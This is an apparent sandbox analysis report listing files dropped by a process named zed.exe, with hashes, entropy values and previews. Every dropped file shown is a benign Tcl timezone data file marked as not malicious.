                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Ushuaia) {.. {-9223372036854775808 -16392 0 LMT}.. {-2372095608 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):199
                                                                                                                                                                                                                                            Entropy (8bit):4.893042770292303
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/V90ppv:MByMYbpwt290/V90b
                                                                                                                                                                                                                                            MD5:CC015E3E5D3293CAA1348B4E0EE5795C
                                                                                                                                                                                                                                            SHA1:75E7EFD905C9001CE9CA5872DA3915A19BCB00E0
                                                                                                                                                                                                                                            SHA-256:7490CD66408B8A14C549278FE67DC3338FE9E458F423F01CCBEA00B5E6F6CEF6
                                                                                                                                                                                                                                            SHA-512:66523F050E4A42A1C9FC8C02B822CD3864A6E35F6364FB6A675F2A503BD8030FE6E380B252068668A79A6593B5042520EE40700DA033517742B3F0ED33D79DAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Aruba) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7944
                                                                                                                                                                                                                                            Entropy (8bit):3.5156463862656775
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:j7RXBXLqbvdvZsV4GGdzVUFg7XaMOhKpJq3o5GMJq90vRFhjGF3RxTBhcXBACBLo:jEJgXh
                                                                                                                                                                                                                                            MD5:181203CAD98E94355B9914A205514904
                                                                                                                                                                                                                                            SHA1:D361CB53955437270905A9432DE9E7F6C1AE7189
                                                                                                                                                                                                                                            SHA-256:EAEFE21276EE60C7F876C1D65039999AC069339DCDB82A23FC9206C274510575
                                                                                                                                                                                                                                            SHA-512:AE9262DFC35579AEB610DF8BB5F7FBB49232195F55F78402405017681F72C0D2A09FA9EB605B406065A1F44FE6785AC0163870C921DAFFC4746DA6EDA3081521
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Asuncion) {.. {-9223372036854775808 -13840 0 LMT}.. {-2524507760 -13840 0 AMT}.. {-1206389360 -14400 0 -04}.. {86760000 -10800 0 -03}.. {134017200 -14400 0 -04}.. {162878400 -14400 0 -04}.. {181368000 -10800 1 -04}.. {194497200 -14400 0 -04}.. {212990400 -10800 1 -04}.. {226033200 -14400 0 -04}.. {244526400 -10800 1 -04}.. {257569200 -14400 0 -04}.. {276062400 -10800 1 -04}.. {291783600 -14400 0 -04}.. {307598400 -10800 1 -04}.. {323406000 -14400 0 -04}.. {339220800 -10800 1 -04}.. {354942000 -14400 0 -04}.. {370756800 -10800 1 -04}.. {386478000 -14400 0 -04}.. {402292800 -10800 1 -04}.. {418014000 -14400 0 -04}.. {433828800 -10800 1 -04}.. {449636400 -14400 0 -04}.. {465451200 -10800 1 -04}.. {481172400 -14400 0 -04}.. {496987200 -10800 1 -04}.. {512708400 -14400 0 -04}.. {528523200 -10800 1 -04}.. {544244400 -14400 0 -04}.. {5
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.791603790249234
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE/qlOi+4IAcGEu5B:SlSWB9vsM3y7oDSHAIgpdN/290/qlf+M
                                                                                                                                                                                                                                            MD5:5A45B70C79F533548B3DD332F988E15B
                                                                                                                                                                                                                                            SHA1:C7485828619A1D4F5CA59D80ABD197100AC58F64
                                                                                                                                                                                                                                            SHA-256:518BEB6E54AE811F8C725EA8CC42787D48FC605A3476D6E7A00A1B5733CBD6AC
                                                                                                                                                                                                                                            SHA-512:A81C2EBE282E019ED011EADDB8F74C3E6FBE88D87E8D8706B3022CDCC48EF92AD90F9BCF9F25031664BB6EFE069EAFDD23D9B55BF672FC7528A2DD8CB6B986B4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Atikokan) $TZData(:America/Panama)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):177
                                                                                                                                                                                                                                            Entropy (8bit):4.812527147763069
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/yO5WXHAIg20/yOoNvWARL/2IAcGE/ol7x+IAcGs:SlSWB9vsM3y7/yrHAIgp/yH0AN/290/e
                                                                                                                                                                                                                                            MD5:13479F64BFBDC7583C637E1562C454B4
                                                                                                                                                                                                                                            SHA1:2F59484C779B0D6033FC14E205DA9BCAB7A5FCB1
                                                                                                                                                                                                                                            SHA-256:1D6FEE336E71FFFB64874A830C976867C071EBF6B133C296B32F87E3E7D814C9
                                                                                                                                                                                                                                            SHA-512:D2C5D35BBBDAB8D58BF6185328124796C06B67ADFB4C1828BA5A9CCA500A01BB8BE69635AE7EEA7FA837A27B20D488A08A29B121DD1617BC373390AD95D67E39
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Adak)]} {.. LoadTimeZoneFile America/Adak..}..set TZData(:America/Atka) $TZData(:America/Adak)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2012
                                                                                                                                                                                                                                            Entropy (8bit):3.703391569010329
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5/ChlvEw6kSSx5H4a8tf3fku+da2XUd23t8VZDG8+GyOd:VIlvEwJSSxdF8tfMu+da2kdCt8VZy8+K
                                                                                                                                                                                                                                            MD5:69DCC2477D8D81E2F49D295DB6907190
                                                                                                                                                                                                                                            SHA1:3C6ED0CEF15D3265C962873480EE1809A4DCACA2
                                                                                                                                                                                                                                            SHA-256:64F1EC14F6B43FF10B564F839152E88DF9262F0947D1DB347557FA902F6FD48C
                                                                                                                                                                                                                                            SHA-512:71DEA6D47F267AA7326A011872FA74762FA4F8CD57EB149E3B56B3DE9097B0B9258BC4F6C29188B49FC60C1942869B92D9E59FEE6980A5DA5D0029C383D99F39
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia) {.. {-9223372036854775808 -9244 0 LMT}.. {-1767216356 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2073
                                                                                                                                                                                                                                            Entropy (8bit):4.021485901155292
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:56hey9WUQwuz/V/NF01Y3A6S++S+vS+QQS+1S+9fS+BrS+HoS+8S+/N5S+5zNZf+:5pUIdFS1Y3FUlWQnH7eelN5Lh9LY5Lj
                                                                                                                                                                                                                                            MD5:4655AE5AB9C39CA05C1FF36FC366679F
                                                                                                                                                                                                                                            SHA1:F3F1D08EC35907A8F45AA2CFD097F6DCCA75C9B8
                                                                                                                                                                                                                                            SHA-256:A6233E5BB0D3B30D0E3B94CD797718041AC3C2E75B387D6646A5C0376C5591CD
                                                                                                                                                                                                                                            SHA-512:3915B845A312147C5B047096033B3D153E4E83AF4C8E4AAA73C8D12E2A8386CFE8EC4568730F9F28863017A60622DD9CC7D97991C966779B4068BC29F6C6B2B3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia_Banderas) {.. {-9223372036854775808 -25260 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):648
                                                                                                                                                                                                                                            Entropy (8bit):4.251560000277241
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290eWmdH9Colj/uFkv/lC1/uFkOzQs/lps/Ozfah/OzT/lN/uFkX/ll/uFki:5TWeUo5Skv/Y1SkA/g/Bh/m/rSkX/zSt
                                                                                                                                                                                                                                            MD5:DC4FA44B2174A4E6F0644FA8EA2E83F9
                                                                                                                                                                                                                                            SHA1:C12DF8C862A05D569EAF189272F8BF44303595A1
                                                                                                                                                                                                                                            SHA-256:FD5E04136506C6543A9ACDC890A30BCF0D561148E1063EC857E3913DE1EBA404
                                                                                                                                                                                                                                            SHA-512:5AC307CD48132B57215CCBAF0BB63F7FA9C5B28DC9F6217C905885D75B0DF131238D4DB2AE707C3DDEE2EDE6C0914644B435FB1CDD9913600D8B69AE95578B0F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Barbados) {.. {-9223372036854775808 -14309 0 LMT}.. {-1841256091 -14400 0 AST}.. {-874263600 -10800 1 ADT}.. {-862682400 -14400 0 AST}.. {-841604400 -10800 1 ADT}.. {-830714400 -14400 0 AST}.. {-820526400 -14400 0 -0330}.. {-811882800 -12600 1 AST}.. {-798660000 -14400 0 -0330}.. {-788904000 -14400 0 AST}.. {234943200 -10800 1 ADT}.. {244616400 -14400 0 AST}.. {261554400 -10800 1 ADT}.. {276066000 -14400 0 AST}.. {293004000 -10800 1 ADT}.. {307515600 -14400 0 AST}.. {325058400 -10800 1 ADT}.. {338706000 -14400 0 AST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1031
                                                                                                                                                                                                                                            Entropy (8bit):3.8842563546204225
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5fe300cChlrLPsw6kSS3h5R14eH8tf3xd:5+CChlvEw6kSSx5H4a8tf3xd
                                                                                                                                                                                                                                            MD5:DFA5E50F6AEF1311A4CF74970477E390
                                                                                                                                                                                                                                            SHA1:5B63676EB8039B2BE767BAA44820F2DAE5B62876
                                                                                                                                                                                                                                            SHA-256:549625CCB30BD0E025BAC47668BA3AA0CDD8569E5887E483C8D62B5B7302FA50
                                                                                                                                                                                                                                            SHA-512:4BBB43694E3B54339C549AC3A5488B77366DB1189D8D1834DCF618D9448084A950B575E207064521B1CDFD2E41F7D1D8C5CD9CEB4668D4459585649556136EB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belem) {.. {-9223372036854775808 -11636 0 LMT}.. {-1767213964 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3284
                                                                                                                                                                                                                                            Entropy (8bit):3.8546064195941097
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5pKSxZwR9IVQU55DG5krgGN8wW+YeD1yyfCwoc:HKSjgIVzrG5krRN8wWheD1yu
                                                                                                                                                                                                                                            MD5:4DA622B685B3B075CC94FC4E23322547
                                                                                                                                                                                                                                            SHA1:DEB23F0A434549DAE1BE60ACF757BB212C907B92
                                                                                                                                                                                                                                            SHA-256:E07F45264E28FD5AA54BD48CB701658509829CF989EC9BD79498D070A1BA270F
                                                                                                                                                                                                                                            SHA-512:9B00BF8870BC4AAEF7F06FCDFEEEF54686A2CC890103696631EB4DEF5AEEAD051EC9069D70A2B22397F18C0067E03A54E75DA18474D6B1BD3BDA2D5313E0AD16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belize) {.. {-9223372036854775808 -21168 0 LMT}.. {-1822500432 -21600 0 CST}.. {-1616954400 -19800 1 -0530}.. {-1606069800 -21600 0 CST}.. {-1585504800 -19800 1 -0530}.. {-1574015400 -21600 0 CST}.. {-1554055200 -19800 1 -0530}.. {-1542565800 -21600 0 CST}.. {-1522605600 -19800 1 -0530}.. {-1511116200 -21600 0 CST}.. {-1490551200 -19800 1 -0530}.. {-1479666600 -21600 0 CST}.. {-1459101600 -19800 1 -0530}.. {-1448217000 -21600 0 CST}.. {-1427652000 -19800 1 -0530}.. {-1416162600 -21600 0 CST}.. {-1396202400 -19800 1 -0530}.. {-1384713000 -21600 0 CST}.. {-1364752800 -19800 1 -0530}.. {-1353263400 -21600 0 CST}.. {-1333303200 -19800 1 -0530}.. {-1321813800 -21600 0 CST}.. {-1301248800 -19800 1 -0530}.. {-1290364200 -21600 0 CST}.. {-1269799200 -19800 1 -0530}.. {-1258914600 -21600 0 CST}.. {-1238349600 -19800 1 -0530}.. {-1226860200 -21600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):206
                                                                                                                                                                                                                                            Entropy (8bit):4.938043196147077
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290F490ppv:MByMYbpwt290S90b
                                                                                                                                                                                                                                            MD5:09FD8280CC890F238126F9641DB7C90E
                                                                                                                                                                                                                                            SHA1:98AB4E0DE8173C2BB2532B07FAE2E71F588AB26F
                                                                                                                                                                                                                                            SHA-256:FACD0A835D1F425CD323EE453ADE231810B2D1CF6EBA227BA1B50522AE3879F7
                                                                                                                                                                                                                                            SHA-512:117C24389B7BFB079F4409B1FA6AA547654D7C69A6CBB19218BF2B96F6CFE3CBAAD400D4C2EFE8A9BFE25F44402057427FC8A62DC20A98018D23A7CF9B87401F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Blanc-Sablon) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1199
                                                                                                                                                                                                                                            Entropy (8bit):3.7988385604912893
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5EThevwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQZ:5EHSeSFESoSQSrSsCSeSPS1cSQSQlSsp
                                                                                                                                                                                                                                            MD5:9529221F9B4E104CC598491703B10E6C
                                                                                                                                                                                                                                            SHA1:5ACD61B525A18DE1919A7484C92EC5D787DF2F25
                                                                                                                                                                                                                                            SHA-256:10592EA1CB0D02C06A61059EC601F70A706A5053AC923B9EED29388D5E71EF3A
                                                                                                                                                                                                                                            SHA-512:66BEDB631469651A5E426155428764E3C1C14483E6FEE1505812E8676EB6E82CF0A88F6CC697F03FDA0AF906D91C7DE6E940DF3D33DD247BEF51DBD9A13DEE16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boa_Vista) {.. {-9223372036854775808 -14560 0 LMT}.. {-1767211040 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):246
                                                                                                                                                                                                                                            Entropy (8bit):4.705337479465446
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290bJhDm2OHDgoHvcuknov/zEXPKV2kR/uFVEV/KVg:MB86290bLmdHDgCvcukCz8O2Y/uF2/Og
                                                                                                                                                                                                                                            MD5:DB019451A7D678C3E7AEE706283861F6
                                                                                                                                                                                                                                            SHA1:57E63C5372F50CBD1A7FA32688C1B77ADDCC06EB
                                                                                                                                                                                                                                            SHA-256:B6ADC16815DC95E537548CA3572D7F93626A6D1DC390DD4CBABAB5AB855BBA30
                                                                                                                                                                                                                                            SHA-512:6C94B2D7EFA856E6BD41FC45B0E8D16A40E61D8B895397CD71230047FAD4793DDB9ABAAC57D2841549F161C9389D7E61D54D38F1BAC6F13ED3DD4C68CDD3272C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bogota) {.. {-9223372036854775808 -17776 0 LMT}.. {-2707671824 -17776 0 BMT}.. {-1739041424 -18000 0 -05}.. {704869200 -14400 1 -05}.. {733896000 -18000 0 -05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8605
                                                                                                                                                                                                                                            Entropy (8bit):3.8563913604109064
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:eSwtktXNmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/jXNDPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:005D0BF1320030A7E9CDC97D0C8BB44B
                                                                                                                                                                                                                                            SHA1:CB236DA840A49B4BCD261114DCA38DADA567B091
                                                                                                                                                                                                                                            SHA-256:93AF910CB2AD2203B71C1AD49D56DF4A4A14D07F885AFD4E755271F1372A517C
                                                                                                                                                                                                                                            SHA-512:16A5483392741673BEC020EF6EBE963AB0FB12629D662C586C27A1E9A1BE3FEA8DC3D05A0E84917B8166E48CADA45C74DFABFDC897A6BC94D3C5058D31AD5126
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boise) {.. {-9223372036854775808 -27889 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-1471788000 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126255600 -25200 0 MST}.. {129114000 -21600 0 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):239
                                                                                                                                                                                                                                            Entropy (8bit):4.821972751564724
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MQA+zAHAIgp/MQA+zE5N/290BFzk5h490/MQA+zd:MByMY/MV+zhp/MV+zE5t290rzy490/MW
                                                                                                                                                                                                                                            MD5:6700956D5FE96CEC8D34EB49FF805374
                                                                                                                                                                                                                                            SHA1:69B9973EF31AE204EFED7485E59CEA99E00815C8
                                                                                                                                                                                                                                            SHA-256:DEFC5C9DA2D4D4146145A50D692A6BFF698C3B0A1F19EFD82AD0EE7678F39FCF
                                                                                                                                                                                                                                            SHA-512:A80C03A519F00A4270248E885463090A34B3992B3DEBA94DD6AEBCC50736541655461E4AA10856125B8EF9B92CEB697429EE7088DBC6AB4FAE383FDF11521B7A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Buenos_Aires)]} {.. LoadTimeZoneFile America/Argentina/Buenos_Aires..}..set TZData(:America/Buenos_Aires) $TZData(:America/Argentina/Buenos_Aires)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7739
                                                                                                                                                                                                                                            Entropy (8bit):3.8713679494465016
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:zsGaLV9T1sF7Lv/PCewtA8CzSPyDLbrcUia:h5lLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:E6AE12CDB55FED492C253E46E2690FE0
                                                                                                                                                                                                                                            SHA1:CD3699E50BC1694827E51E4101C713E52FA646C8
                                                                                                                                                                                                                                            SHA-256:3E0506A54B562DBC3AA6889DDD39B327FE0B85C63B00F0B39D606921A0936A59
                                                                                                                                                                                                                                            SHA-512:BA3D5D5420210E74E74A581C9678224948266828A8FACE06383E41E13475C682F82D288426FB915D618FFE7ED95BD8F1C7E9D59D31CE5B464D5EC1363AB5E340
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cambridge_Bay) {.. {-9223372036854775808 0 0 -00}.. {-1577923200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2918
                                                                                                                                                                                                                                            Entropy (8bit):3.6039149423727013
                                                                                                                                                                                                                                            Encrypted:false
